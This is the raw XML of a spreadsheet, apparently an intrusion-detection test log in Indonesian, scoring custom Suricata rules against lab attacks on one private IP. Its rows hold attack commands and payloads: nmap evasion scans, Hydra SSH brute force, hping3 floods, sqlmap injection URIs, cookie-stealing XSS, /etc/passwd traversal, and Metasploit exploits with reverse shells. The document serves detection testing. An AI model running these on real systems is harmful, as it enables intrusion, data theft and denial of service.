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nde 1" sheetId="1" r:id="rId5"/>
    <sheet state="visible" name="Ronde 2" sheetId="2" r:id="rId6"/>
    <sheet state="visible" name="Ronde 3" sheetId="3" r:id="rId7"/>
    <sheet state="visible" name="Ronde 4" sheetId="4" r:id="rId8"/>
    <sheet state="visible" name="Ronde 5" sheetId="5" r:id="rId9"/>
    <sheet state="visible" name="Ronde 6" sheetId="6" r:id="rId10"/>
    <sheet state="visible" name="Ronde 7" sheetId="7" r:id="rId11"/>
    <sheet state="visible" name="Ronde 8" sheetId="8" r:id="rId12"/>
    <sheet state="visible" name="Ronde 9" sheetId="9" r:id="rId13"/>
    <sheet state="visible" name="Ronde 10" sheetId="10" r:id="rId14"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1420" uniqueCount="113">
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Ronde</t>
  </si>
  <si>
    <t>Fase (Set)</t>
  </si>
  <si>
    <t>Skenario Serangan</t>
  </si>
  <si>
    <t>Level</t>
  </si>
  <si>
    <t>Teknik / Payload (Detail)</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>TP (Deteksi Benar)</t>
  </si>
  <si>
    <t>FN (Gagal Deteksi)</t>
  </si>
  <si>
    <t>FP (Salah Alert Noise)</t>
  </si>
  <si>
    <t>TN (Noise Aman)</t>
  </si>
  <si>
    <t>Request</t>
  </si>
  <si>
    <t>Nama Alert Suricata</t>
  </si>
  <si>
    <t>Catatan</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>Nmap</t>
  </si>
  <si>
    <t>Aggressive Service Scan (T4)</t>
  </si>
  <si>
    <t>nmap -sV -T4 -F 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP] Nmap SYN Port Scan - Aggressive Scan Detected (High Confidence)</t>
  </si>
  <si>
    <t>Fragmented Scan (Standard 8-byte)</t>
  </si>
  <si>
    <t>nmap -f -sS -p 21,22,80,3306 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP] Nmap Evasion Technique - Packet Fragmentation (-f / --mtu) (High Confidence), [TA-SIG::S02-HYDRA-SSH] SSH Authentication Brute Force Attempt (High Confidence)</t>
  </si>
  <si>
    <t>Alert SSH muncul, karena nmap melakukan scan ke port 22 dan count di rule terpenuhi, untuk saat ini di klasifikasi sebagai FP (False Positive)</t>
  </si>
  <si>
    <t>Decoy &amp; FIN Stealth Scan</t>
  </si>
  <si>
    <t>nmap -D RND:5 -sF -p 80 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S01-NMAP-FIN] Nmap Stealth Scan - FIN Scan Detected (High Confidence)</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>SSH Fast Brute Force (Short List)</t>
  </si>
  <si>
    <t>hydra -l msfadmin -P logs/pass_short.txt ssh://192.168.113.50 -t 4</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>[TA-SIG::S02-HYDRA-SSH] SSH Authentication Brute Force Attempt (High Confidence)</t>
  </si>
  <si>
    <t>SSH Low &amp; Slow (Wait 5s)</t>
  </si>
  <si>
    <t>hydra -l msfadmin -P logs/pass_short.txt ssh://192.168.113.50 -t 1 -w 5</t>
  </si>
  <si>
    <t>SSH Password Spraying</t>
  </si>
  <si>
    <t>hydra -L logs/user_list.txt -p password123 ssh://192.168.113.50 -t 4</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t>ICMP Flood (Smurf/Ping)</t>
  </si>
  <si>
    <t>timeout 30 hping3 -1 --flood 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S03-DOS-ICMP] ICMP Flood - Echo/Timestamp Request Flood Detected (High Confidence)</t>
  </si>
  <si>
    <t>SYN Flood (Port 80/HTTP)</t>
  </si>
  <si>
    <t>timeout 30 hping3 -S -p 80 --flood 192.168.113.50</t>
  </si>
  <si>
    <t>[TA-SIG::S03-DOS-SYN] TCP SYN Flood - Distributed / Random Source Attack Detected (High Confidence)</t>
  </si>
  <si>
    <t>Random Source IP Spoofing (DDoS Sim)</t>
  </si>
  <si>
    <t>timeout 30 hping3 -S -p 80 --flood --rand-source 192.168.113.50</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>Basic Injection (Batch Mode)</t>
  </si>
  <si>
    <t>sqlmap -u "url" --batch --dbs</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716b706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x776f65796f61%2Cschema_name%29%29%2C0x7170767871%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23&amp;Submit=Submit</t>
  </si>
  <si>
    <t>[TA-SIG::S04-SQLI-LOGIC]SQL Injection - Boolean-Based Injection in URI (Tamper Detected) (High Confidence)
[TA-SIG::S04-SQLI-HEADER] SQL Injection - Blind Injection in HTTP Header / Cookie (High Confidence)
[TA-SIG::S04-SQLI-UNION] SQL Injection - Obfuscated UNION/SELECT Injection in URI (High Confidence)
[TA-SIG::S04-SQLI-TIME] SQL Injection - Time-Based Blind Injection Detected (High Confidence)</t>
  </si>
  <si>
    <t>Tamper: Space2Comment &amp; RandomCase</t>
  </si>
  <si>
    <t>sqlmap ... --tamper=space2comment,randomcase</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/sqli/?id=1%27%2F%2A%2A%2FUNIOn%2F%2A%2A%2FAlL%2F%2A%2A%2FSelecT%2F%2A%2A%2FNulL%2CCOncaT%280x716b706a71%2CJsoN_arRAYAGG%28COncaT_WS%280x776f65796f61%2CSCHEMa_NaME%29%29%2C0x7170767871%29%2F%2A%2A%2FFRom%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%23&amp;Submit=Submit</t>
  </si>
  <si>
    <t>Time-Based Blind (Level 5/Risk 3)</t>
  </si>
  <si>
    <t>sqlmap ... --technique=T --level=5 --risk=3</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>Reflected XSS (Script Tag)</t>
  </si>
  <si>
    <t>curl ... ?name=&lt;script&gt;alert('XSS')&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E </t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-TAG-REFLECTED] XSS - HTML Tag Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Evasion: IMG Tag OnError</t>
  </si>
  <si>
    <t>curl ... ?name=&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/xss_r/?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E </t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-EVENT-REFLECTED] XSS - HTML Event Handler Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Stored XSS via POST (HTTP Body)</t>
  </si>
  <si>
    <t>curl -X POST -d "mtxMessage=&lt;script&gt;alert..."</t>
  </si>
  <si>
    <t>[POST Data Body] : txtName=HackerA&amp;mtxMessage=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp;btnSign=Sign+Guestbook</t>
  </si>
  <si>
    <t>[TA-SIG::S05-XSS-TAG-STORED] XSS - HTML Tag Injection in POST Body (High Confidence)</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>Basic Traversal (/etc/passwd)</t>
  </si>
  <si>
    <t>curl .../fi/?page=../../../../../etc/passwd</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd </t>
  </si>
  <si>
    <t>[TA-SIG::S06-LFI-TRAVERSAL] Local File Inclusion - Directory Traversal Attempt in URI (High Confidence), [TA-SIG::S06-LFI-FAILSAFE]Local File Inclusion - Sensitive File Access Attempt (OS Files) in URI (High Confidence), [TA-SIG::S06-LFI-WRAPPER] Local File Inclusion - PHP Wrapper / Filter Injection in URI (High Confidence)</t>
  </si>
  <si>
    <t>Evasion: URL Encoding (Standard)</t>
  </si>
  <si>
    <t>curl .../fi/?page=..%2f..%2f..%2f...</t>
  </si>
  <si>
    <t xml:space="preserve">/dvwa/vulnerabilities/fi/?page=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd </t>
  </si>
  <si>
    <t>PHP Wrapper Filter (Base64 Encode)</t>
  </si>
  <si>
    <t>curl .../fi/?page=php://filter/convert...</t>
  </si>
  <si>
    <t>/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd</t>
  </si>
  <si>
    <t>RCE</t>
  </si>
  <si>
    <t>Exploit VSFTPD v2.3.4 (Backdoor)</t>
  </si>
  <si>
    <t>use exploit/unix/ftp/vsftpd_234_backdoor; run</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-VSFTPD] Remote Code Execution - VSFTPD v2.3.4 Backdoor Trigger Attempt (High Confidence)</t>
  </si>
  <si>
    <t>Samba Usermap + Double Reverse TCP</t>
  </si>
  <si>
    <t>use ...samba/usermap_script; set PAYLOAD cmd/unix/reverse</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-SAMBA] Remote Code Execution Samba Usermap Script Command Injection (CVE-2007-2447) (High Confidence)</t>
  </si>
  <si>
    <t>DistCC Daemon + Double Reverse TCP</t>
  </si>
  <si>
    <t>use ...misc/distcc_exec; set PAYLOAD cmd/unix/reverse</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-DISTCC] Remote Code Execution - DistCC Daemon Command Injection Attempt (High Confidence)</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>Normal</t>
  </si>
  <si>
    <t>Download File Binary (.exe)</t>
  </si>
  <si>
    <t>wget ... procmon.exe</t>
  </si>
  <si>
    <t>Exp: ET POLICY PE EXE</t>
  </si>
  <si>
    <t>System Update (APT User-Agent)</t>
  </si>
  <si>
    <t>curl -A "Debian APT..."</t>
  </si>
  <si>
    <t>Exp: ET POLICY GNU/Linux APT</t>
  </si>
  <si>
    <t>SSH Login Valid (Berulang)</t>
  </si>
  <si>
    <t>sshpass ... (loop 5x)</t>
  </si>
  <si>
    <t>Exp: ET SCAN Potential SSH Brute</t>
  </si>
  <si>
    <t>Network Diag (Jumbo Ping)</t>
  </si>
  <si>
    <t>ping -s 2000</t>
  </si>
  <si>
    <t>Exp: GPL ICMP INFO PING</t>
  </si>
  <si>
    <t>FTP Login (Cleartext/Valid)</t>
  </si>
  <si>
    <t>curl ftp://...</t>
  </si>
  <si>
    <t>Exp: ET POLICY FTP Login</t>
  </si>
  <si>
    <t>Akses Non-Standard Port (8180)</t>
  </si>
  <si>
    <t>curl ...:8180</t>
  </si>
  <si>
    <t>Exp: ET POLICY HTTP ... port</t>
  </si>
  <si>
    <t>404 Error Storm (Typo User)</t>
  </si>
  <si>
    <t>curl .../file_acak</t>
  </si>
  <si>
    <t>Exp: ET SCAN Potential HTTP 404</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-DISTCC] Remote Code Execution - DistCC Daemon Command Injection Attempt (High Confidence), [TA-SIG::S07-RCE-CALLBACK] Remote Code Execution - Reverse Shell Callback Connection Detected (High Confidence)</t>
  </si>
  <si>
    <t>[TA-SIG::S07-RCE-DISTCC] Remote Code Execution - DistCC Daemon Command Injection Attempt (High Confidence),  [TA-SIG::S07-RCE-CALLBACK] Remote Code Execution - Reverse Shell Callback Connection Detected (High Confidence)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</si>
</sst>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0.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <i/>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial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sz val="9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shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3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left" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" vertical="top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8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25"/>
    <col customWidth="1" hidden="1" min="2" max="2" width="7.25"/>
    <col customWidth="1" min="3" max="3" width="6.75"/>
    <col customWidth="1" min="4" max="4" width="16.0"/>
    <col customWidth="1" min="5" max="5" width="10.0"/>
    <col customWidth="1" min="6" max="7" width="23.13"/>
    <col customWidth="1" hidden="1" min="12" max="12" width="36.88"/>
    <col customWidth="1" min="13" max="13" width="84.88"/>
    <col customWidth="1" min="14" max="14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3">
        <v>1.0</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>15</v>
      </c>
      <c r="E2" s="2">
        <v>1.0</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>16</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>17</v>
      </c>
      <c r="H2" s="2">
        <v>1.0</v>
      </c>
      <c r="I2" s="2">
        <v>0.0</v>
      </c>
      <c r="J2" s="2">
        <v>0.0</v>
      </c>
      <c r="K2" s="2">
        <v>0.0</v>
      </c>
      <c r="L2" s="2"/>
      <c r="M2" s="2" t="s">
        <v>18</v>
      </c>
      <c r="N2" s="2"/>
    </row>
    <row r="3">
      <c r="A3" s="2">
        <v>2.0</v>
      </c>
      <c r="E3" s="2">
        <v>2.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>19</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>20</v>
      </c>
      <c r="H3" s="2">
        <v>1.0</v>
      </c>
      <c r="I3" s="2">
        <v>0.0</v>
      </c>
      <c r="J3" s="2">
        <v>1.0</v>
      </c>
      <c r="K3" s="2">
        <v>0.0</v>
      </c>
      <c r="L3" s="5"/>
      <c r="M3" s="2" t="s">
        <v>21</v>
      </c>
      <c r="N3" s="5" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2">
        <v>3.0</v>
      </c>
      <c r="E4" s="2">
        <v>3.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>24</v>
      </c>
      <c r="H4" s="2">
        <v>1.0</v>
      </c>
      <c r="I4" s="2">
        <v>0.0</v>
      </c>
      <c r="J4" s="2">
        <v>0.0</v>
      </c>
      <c r="K4" s="2">
        <v>0.0</v>
      </c>
      <c r="L4" s="2"/>
      <c r="M4" s="2" t="s">
        <v>25</v>
      </c>
      <c r="N4" s="2"/>
    </row>
    <row r="5">
      <c r="A5" s="2">
        <v>4.0</v>
      </c>
      <c r="B5" s="3">
        <v>1.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E5" s="2">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>27</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>28</v>
      </c>
      <c r="H5" s="2">
        <v>1.0</v>
      </c>
      <c r="I5" s="2">
        <v>0.0</v>
      </c>
      <c r="J5" s="2">
        <v>0.0</v>
      </c>
      <c r="K5" s="2">
        <v>0.0</v>
      </c>
      <c r="L5" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M5" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N5" s="2"/>
    </row>
    <row r="6">
      <c r="A6" s="2">
        <v>5.0</v>
      </c>
      <c r="E6" s="2">
        <v>2.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>32</v>
      </c>
      <c r="H6" s="2">
        <v>1.0</v>
      </c>
      <c r="I6" s="2">
        <v>0.0</v>
      </c>
      <c r="J6" s="2">
        <v>0.0</v>
      </c>
      <c r="K6" s="2">
        <v>0.0</v>
      </c>
      <c r="L6" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M6" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N6" s="2"/>
    </row>
    <row r="7">
      <c r="A7" s="2">
        <v>6.0</v>
      </c>
      <c r="E7" s="2">
        <v>3.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>33</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>34</v>
      </c>
      <c r="H7" s="2">
        <v>1.0</v>
      </c>
      <c r="I7" s="2">
        <v>0.0</v>
      </c>
      <c r="J7" s="2">
        <v>0.0</v>
      </c>
      <c r="K7" s="2">
        <v>0.0</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M7" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N7" s="2"/>
    </row>
    <row r="8">
      <c r="A8" s="2">
        <v>7.0</v>
      </c>
      <c r="B8" s="3">
        <v>1.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E8" s="2">
        <v>1.0</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>36</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>37</v>
      </c>
      <c r="H8" s="2">
        <v>1.0</v>
      </c>
      <c r="I8" s="2">
        <v>0.0</v>
      </c>
      <c r="J8" s="2">
        <v>0.0</v>
      </c>
      <c r="K8" s="2">
        <v>0.0</v>
      </c>
      <c r="L8" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M8" s="2" t="s">
        <v>38</v>
      </c>
      <c r="N8" s="2"/>
    </row>
    <row r="9">
      <c r="A9" s="2">
        <v>8.0</v>
      </c>
      <c r="E9" s="2">
        <v>2.0</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>39</v>
      </c>
      <c r="G9" s="6" t="s">
        <v>40</v>
      </c>
      <c r="H9" s="2">
        <v>1.0</v>
      </c>
      <c r="I9" s="2">
        <v>0.0</v>
      </c>
      <c r="J9" s="2">
        <v>0.0</v>
      </c>
      <c r="K9" s="2">
        <v>0.0</v>
      </c>
      <c r="L9" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M9" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N9" s="2"/>
    </row>
    <row r="10">
      <c r="A10" s="2">
        <v>9.0</v>
      </c>
      <c r="E10" s="2">
        <v>3.0</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>42</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>43</v>
      </c>
      <c r="H10" s="2">
        <v>1.0</v>
      </c>
      <c r="I10" s="2">
        <v>0.0</v>
      </c>
      <c r="J10" s="2">
        <v>0.0</v>
      </c>
      <c r="K10" s="2">
        <v>0.0</v>
      </c>
      <c r="L10" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M10" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N10" s="2"/>
    </row>
    <row r="11">
      <c r="A11" s="2">
        <v>10.0</v>
      </c>
      <c r="B11" s="3">
        <v>1.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>44</v>
      </c>
      <c r="E11" s="2">
        <v>1.0</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>45</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>46</v>
      </c>
      <c r="H11" s="2">
        <v>1.0</v>
      </c>
      <c r="I11" s="2">
        <v>0.0</v>
      </c>
      <c r="J11" s="2">
        <v>0.0</v>
      </c>
      <c r="K11" s="2">
        <v>0.0</v>
      </c>
      <c r="L11" s="2" t="s">
        <v>47</v>
      </c>
      <c r="M11" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N11" s="2"/>
    </row>
    <row r="12">
      <c r="A12" s="2">
        <v>11.0</v>
      </c>
      <c r="E12" s="2">
        <v>2.0</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>49</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>50</v>
      </c>
      <c r="H12" s="2">
        <v>1.0</v>
      </c>
      <c r="I12" s="2">
        <v>0.0</v>
      </c>
      <c r="J12" s="2">
        <v>0.0</v>
      </c>
      <c r="K12" s="2">
        <v>0.0</v>
      </c>
      <c r="L12" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M12" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N12" s="2"/>
    </row>
    <row r="13">
      <c r="A13" s="2">
        <v>12.0</v>
      </c>
      <c r="E13" s="2">
        <v>3.0</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>52</v>
      </c>
      <c r="G13" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H13" s="2">
        <v>1.0</v>
      </c>
      <c r="I13" s="2">
        <v>0.0</v>
      </c>
      <c r="J13" s="2">
        <v>0.0</v>
      </c>
      <c r="K13" s="2">
        <v>0.0</v>
      </c>
      <c r="L13" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N13" s="2"/>
    </row>
    <row r="14">
      <c r="A14" s="2">
        <v>13.0</v>
      </c>
      <c r="B14" s="3">
        <v>1.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>54</v>
      </c>
      <c r="E14" s="2">
        <v>1.0</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>55</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>56</v>
      </c>
      <c r="H14" s="2">
        <v>1.0</v>
      </c>
      <c r="I14" s="2">
        <v>0.0</v>
      </c>
      <c r="J14" s="2">
        <v>0.0</v>
      </c>
      <c r="K14" s="2">
        <v>0.0</v>
      </c>
      <c r="L14" s="2" t="s">
        <v>57</v>
      </c>
      <c r="M14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="N14" s="2"/>
    </row>
    <row r="15">
      <c r="A15" s="2">
        <v>14.0</v>
      </c>
      <c r="E15" s="2">
        <v>2.0</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>59</v>
      </c>
      <c r="G15" s="6" t="s">
        <v>60</v>
      </c>
      <c r="H15" s="2">
        <v>1.0</v>
      </c>
      <c r="I15" s="2">
        <v>0.0</v>
      </c>
      <c r="J15" s="2">
        <v>0.0</v>
      </c>
      <c r="K15" s="2">
        <v>0.0</v>
      </c>
      <c r="L15" s="7" t="s">
        <v>61</v>
      </c>
      <c r="M15" s="2" t="s">
        <v>62</v>
      </c>
      <c r="N15" s="2"/>
    </row>
    <row r="16">
      <c r="A16" s="2">
        <v>15.0</v>
      </c>
      <c r="E16" s="2">
        <v>3.0</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>63</v>
      </c>
      <c r="G16" s="6" t="s">
        <v>64</v>
      </c>
      <c r="H16" s="2">
        <v>1.0</v>
      </c>
      <c r="I16" s="2">
        <v>0.0</v>
      </c>
      <c r="J16" s="2">
        <v>0.0</v>
      </c>
      <c r="K16" s="2">
        <v>0.0</v>
      </c>
      <c r="L16" s="2" t="s">
        <v>65</v>
      </c>
      <c r="M16" s="2" t="s">
        <v>66</v>
      </c>
      <c r="N16" s="2"/>
    </row>
    <row r="17">
      <c r="A17" s="2">
        <v>16.0</v>
      </c>
      <c r="B17" s="3">
        <v>1.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>67</v>
      </c>
      <c r="E17" s="2">
        <v>1.0</v>
      </c>
      <c r="F17" s="6" t="s">
        <v>68</v>
      </c>
      <c r="G17" s="6" t="s">
        <v>69</v>
      </c>
      <c r="H17" s="2">
        <v>1.0</v>
      </c>
      <c r="I17" s="2">
        <v>0.0</v>
      </c>
      <c r="J17" s="2">
        <v>0.0</v>
      </c>
      <c r="K17" s="2">
        <v>0.0</v>
      </c>
      <c r="L17" s="2" t="s">
        <v>70</v>
      </c>
      <c r="M17" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N17" s="2"/>
    </row>
    <row r="18">
      <c r="A18" s="2">
        <v>17.0</v>
      </c>
      <c r="E18" s="2">
        <v>2.0</v>
      </c>
      <c r="F18" s="6" t="s">
        <v>72</v>
      </c>
      <c r="G18" s="6" t="s">
        <v>73</v>
      </c>
      <c r="H18" s="2">
        <v>1.0</v>
      </c>
      <c r="I18" s="2">
        <v>0.0</v>
      </c>
      <c r="J18" s="2">
        <v>0.0</v>
      </c>
      <c r="K18" s="2">
        <v>0.0</v>
      </c>
      <c r="L18" s="2" t="s">
        <v>74</v>
      </c>
      <c r="M18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N18" s="2"/>
    </row>
    <row r="19">
      <c r="A19" s="2">
        <v>18.0</v>
      </c>
      <c r="E19" s="2">
        <v>3.0</v>
      </c>
      <c r="F19" s="6" t="s">
        <v>75</v>
      </c>
      <c r="G19" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H19" s="2">
        <v>1.0</v>
      </c>
      <c r="I19" s="2">
        <v>0.0</v>
      </c>
      <c r="J19" s="2">
        <v>0.0</v>
      </c>
      <c r="K19" s="2">
        <v>0.0</v>
      </c>
      <c r="L19" s="7" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N19" s="2"/>
    </row>
    <row r="20">
      <c r="A20" s="8">
        <v>19.0</v>
      </c>
      <c r="B20" s="9">
        <v>1.0</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>14</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>78</v>
      </c>
      <c r="E20" s="10">
        <v>1.0</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>79</v>
      </c>
      <c r="G20" s="12" t="s">
        <v>80</v>
      </c>
      <c r="H20" s="2">
        <v>1.0</v>
      </c>
      <c r="I20" s="2">
        <v>0.0</v>
      </c>
      <c r="J20" s="2">
        <v>0.0</v>
      </c>
      <c r="K20" s="2">
        <v>0.0</v>
      </c>
      <c r="L20" s="13"/>
      <c r="M20" s="14" t="s">
        <v>81</v>
      </c>
      <c r="N20" s="15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</row>
    <row r="21">
      <c r="A21" s="8">
        <v>20.0</v>
      </c>
      <c r="E21" s="10">
        <v>2.0</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>82</v>
      </c>
      <c r="G21" s="12" t="s">
        <v>83</v>
      </c>
      <c r="H21" s="2">
        <v>1.0</v>
      </c>
      <c r="I21" s="2">
        <v>0.0</v>
      </c>
      <c r="J21" s="2">
        <v>0.0</v>
      </c>
      <c r="K21" s="2">
        <v>0.0</v>
      </c>
      <c r="L21" s="13"/>
      <c r="M21" s="14" t="s">
        <v>84</v>
      </c>
      <c r="N21" s="15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</row>
    <row r="22">
      <c r="A22" s="8">
        <v>21.0</v>
      </c>
      <c r="E22" s="10">
        <v>3.0</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>85</v>
      </c>
      <c r="G22" s="12" t="s">
        <v>86</v>
      </c>
      <c r="H22" s="2">
        <v>1.0</v>
      </c>
      <c r="I22" s="2">
        <v>0.0</v>
      </c>
      <c r="J22" s="2">
        <v>0.0</v>
      </c>
      <c r="K22" s="2">
        <v>0.0</v>
      </c>
      <c r="L22" s="13"/>
      <c r="M22" s="14" t="s">
        <v>87</v>
      </c>
      <c r="N22" s="13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</row>
    <row r="23">
      <c r="A23" s="17">
        <v>22.0</v>
      </c>
      <c r="B23" s="17">
        <v>1.0</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D23" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E23" s="17">
        <v>1.0</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>90</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>91</v>
      </c>
      <c r="H23" s="2">
        <v>0.0</v>
      </c>
      <c r="I23" s="2">
        <v>0.0</v>
      </c>
      <c r="J23" s="2">
        <v>0.0</v>
      </c>
      <c r="K23" s="2">
        <v>2.0</v>
      </c>
      <c r="L23" s="19"/>
      <c r="M23" s="20" t="s">
        <v>92</v>
      </c>
      <c r="N23" s="21"/>
    </row>
    <row r="24">
      <c r="A24" s="17">
        <v>23.0</v>
      </c>
      <c r="B24" s="17">
        <v>1.0</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E24" s="17">
        <v>2.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>93</v>
      </c>
      <c r="G24" s="17" t="s">
